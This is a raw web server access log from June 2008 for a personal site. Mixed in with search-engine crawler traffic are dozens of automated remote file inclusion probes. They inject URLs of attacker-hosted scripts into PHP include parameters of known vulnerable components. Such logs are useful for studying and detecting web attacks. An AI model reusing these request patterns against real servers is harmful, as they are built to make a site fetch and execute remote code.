66.249.67.79 - - [09/Jun/2008:09:53:13 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0040.jpg HTTP/1.1" 200 379587 "-" "Googlebot-Image/1.0" "dmulk.com"
65.55.211.24 - - [09/Jun/2008:09:53:36 -0700] "GET /bikes/?S=A HTTP/1.1" 200 2594 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:53:55 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:09:54:16 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:09:54:16 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
66.195.40.3 - - [09/Jun/2008:09:54:23 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.12.149.44 - - [09/Jun/2008:09:54:34 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.149.44 - - [09/Jun/2008:09:54:35 -0700] "GET /logs//include/lib.inc.php?site_path=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.235.34.216 - - [09/Jun/2008:09:54:55 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.34.216 - - [09/Jun/2008:09:54:55 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.154 - - [09/Jun/2008:09:55:29 -0700] "GET /blog/index.php/2008/04/12/ HTTP/1.0" 200 9283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
83.223.116.60 - - [09/Jun/2008:09:56:16 -0700] "GET /login.php?dir=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:09:56:16 -0700] "GET /logs/access_080113.log/login.php?dir=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:09:56:16 -0700] "GET /logs/login.php?dir=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:09:56:17 -0700] "GET /logs/access_080126.log/login.php?dir=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:09:56:19 -0700] "GET /logs/access_080302.log/index.php?pageurl=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:09:56:22 -0700] "GET /index.php?pageurl=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 200 16871 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:09:56:22 -0700] "GET /logs/index.php?pageurl=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:56:36 -0700] "GET /logs/access_080105.log/print.php?page=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:56:36 -0700] "GET /print.php?page=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:56:36 -0700] "GET /logs/print.php?page=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:56:52 -0700] "GET /logs/access_080228.log/show.php?page=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:56:52 -0700] "GET /show.php?page=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:56:52 -0700] "GET /logs/show.php?page=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.156.192.5 - - [09/Jun/2008:09:56:55 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://tugaspeed.info/system.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:09:57:01 -0700] "GET /logs/access_080101.log/index.php?pageurl=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.195.40.3 - - [09/Jun/2008:09:57:08 -0700] "GET ////common/db.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.86.42.50 - - [09/Jun/2008:09:57:20 -0700] "GET /blog/wp-content/uploads/mvi_0037.avi HTTP/1.1" 200 131072 "http://www.st-owners.com/forums/showthread.php?t=42712" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
83.223.116.60 - - [09/Jun/2008:09:57:21 -0700] "GET /logs/access_080126.log/login.php?dir=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
217.75.193.70 - - [09/Jun/2008:09:57:21 -0700] "GET /login.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:09:57:21 -0700] "GET /logs/login.php?dir=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:57:21 -0700] "GET /logs/access_080131.log/show.php?page=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:09:57:21 -0700] "GET /login.php?dir=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
204.86.42.50 - - [09/Jun/2008:09:57:44 -0700] "GET /blog/wp-content/uploads/mvi_0037.avi HTTP/1.1" 200 196608 "-" "Windows-Media-Player/10.00.00.4058" "dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:57:47 -0700] "GET /logs/access_080225.log/print.php?page=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.157 - - [09/Jun/2008:09:58:05 -0700] "GET /logs/access_080312.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.235.34.216 - - [09/Jun/2008:09:58:11 -0700] "GET /header.php?prefix=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.195.40.3 - - [09/Jun/2008:09:58:17 -0700] "GET /classes/core/language.php?rootdir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.86.42.50 - - [09/Jun/2008:09:58:34 -0700] "GET /blog/wp-content/uploads/mvi_0037.avi HTTP/1.1" 200 9261848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.195.58.169 - - [09/Jun/2008:09:58:41 -0700] "GET /logs/access_080201.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:09:59:10 -0700] "GET /logs/login.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:09:59:10 -0700] "GET /login.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.48.60 - - [09/Jun/2008:09:59:12 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [09/Jun/2008:09:59:12 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.235.34.216 - - [09/Jun/2008:09:59:21 -0700] "GET /logs/access_080503.log/header.php?prefix=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.34.216 - - [09/Jun/2008:09:59:21 -0700] "GET /header.php?prefix=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [09/Jun/2008:09:59:22 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://tugaspeed.info/system.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.34.216 - - [09/Jun/2008:09:59:22 -0700] "GET /logs/header.php?prefix=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.133.173 - - [09/Jun/2008:09:59:49 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.122.36.7 - - [09/Jun/2008:10:00:08 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.122.36.7 - - [09/Jun/2008:10:00:08 -0700] "GET /newspublish/include.php?path[docroot]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:00:14 -0700] "GET /index.php?pageurl=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 200 16855 "-" "libwww-perl/5.810" "www.dmulk.com"
213.215.67.3 - - [09/Jun/2008:10:00:59 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [09/Jun/2008:10:01:00 -0700] "GET /logs/access_080106.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [09/Jun/2008:10:01:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [09/Jun/2008:10:01:01 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [09/Jun/2008:10:01:01 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [09/Jun/2008:10:01:01 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.34.78.106 - - [09/Jun/2008:10:01:13 -0700] "GET /logs/access_071218.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:10:01:49 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 16961 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:10:01:49 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 16961 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.211.155 - - [09/Jun/2008:10:02:09 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.211.155 - - [09/Jun/2008:10:02:09 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.211.155 - - [09/Jun/2008:10:02:09 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:02:26 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:02:26 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:02:26 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:03:17 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.28.115 - - [09/Jun/2008:10:03:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.91 - - [09/Jun/2008:10:03:52 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.186 - - [09/Jun/2008:10:04:09 -0700] "GET /logs/access.log HTTP/1.0" 200 188419 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:04:24 -0700] "GET /logs//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:04:24 -0700] "GET //includes/messages.inc.php?include_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:10:04:53 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [09/Jun/2008:10:04:58 -0700] "GET //includes/messages.inc.php?include_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:10:05:01 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:05:06 -0700] "GET /logs/index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:05:06 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:05:08 -0700] "GET /index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 200 16871 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:05:09 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:05:13 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:05:14 -0700] "GET //includes/messages.inc.php?include_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:05:14 -0700] "GET /logs//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.193.215.56 - - [09/Jun/2008:10:05:18 -0700] "GET /logs/access.log/errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [09/Jun/2008:10:05:18 -0700] "GET /errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [09/Jun/2008:10:05:19 -0700] "GET /logs/errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.32.12 - - [09/Jun/2008:10:05:33 -0700] "GET /logs//errors.php?error=http://www.hmccalendar.com/youth/c?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
151.1.32.12 - - [09/Jun/2008:10:05:34 -0700] "GET /logs//errors.php?error=http://www.hmccalendar.com/youth/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
151.1.32.12 - - [09/Jun/2008:10:05:35 -0700] "GET //errors.php?error=http://www.hmccalendar.com/youth/c?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
151.1.32.12 - - [09/Jun/2008:10:05:36 -0700] "GET //errors.php?error=http://www.hmccalendar.com/youth/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:05:38 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.246.185.183 - - [09/Jun/2008:10:06:18 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:06:35 -0700] "GET /logs/access.log/port.php?content=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:06:35 -0700] "GET /port.php?content=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:06:35 -0700] "GET /logs/port.php?content=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:10:06:56 -0700] "GET /logs/index.php?pageurl=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:10:06:56 -0700] "GET /logs/access_071224.log/index.php?pageurl=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:10:06:58 -0700] "GET /index.php?pageurl=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 200 16857 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.129 - - [09/Jun/2008:10:07:46 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.129 - - [09/Jun/2008:10:07:46 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.129 - - [09/Jun/2008:10:07:46 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:08:03 -0700] "GET /logs/access_080507.log/index.php?ort=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:10:08:04 -0700] "GET /logs/access.log//errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:10:08:04 -0700] "GET //errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:10:08:04 -0700] "GET /logs//errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:10:08:05 -0700] "GET /logs/access_080117.log/index.php?pageurl=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:08:05 -0700] "GET /index.php?ort=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 200 16847 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:08:05 -0700] "GET /logs/index.php?ort=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:08:13 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:08:13 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:08:19 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:08:19 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:08:19 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:10:08:30 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:10:08:30 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:10:08:31 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.129 - - [09/Jun/2008:10:08:31 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:10:08:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Googlebot-Image/1.0" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:10:08:41 -0700] "GET /bikes/dteel/03MAR07/SupraSabre-2.jpg HTTP/1.1" 200 102652 "-" "Googlebot-Image/1.0" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:10:09:03 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:10:09:06 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.172.177.233 - - [09/Jun/2008:10:09:11 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:10:09:11 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
